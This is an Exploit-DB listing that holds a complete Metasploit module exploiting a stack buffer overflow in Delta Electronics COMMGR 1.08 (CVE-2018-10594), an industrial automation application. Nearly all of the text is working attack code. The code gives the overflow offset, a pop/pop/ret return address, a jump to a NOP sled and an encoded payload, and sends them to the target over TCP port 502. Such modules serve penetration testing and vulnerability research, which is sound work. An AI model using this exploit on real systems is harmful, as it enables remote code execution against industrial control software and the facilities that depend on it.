Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)

EDB-ID: 45574
Author: Metasploit
Published: 2018-10-09
CVE: CVE-2018-10594
Type: Remote
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: Metasploit Framework (MSF), Remote
Vulnerable App: N/A

 # This module requires Metasploit: https://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
'ZDI', # Initial discovery
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-10594' ],
[ 'BID', '104529' ],
[ 'ZDI', '18-586' ],
[ 'ZDI', '18-588' ],
[ 'EDB', '44965' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(502)
])
end

def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded

print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end

Related Posts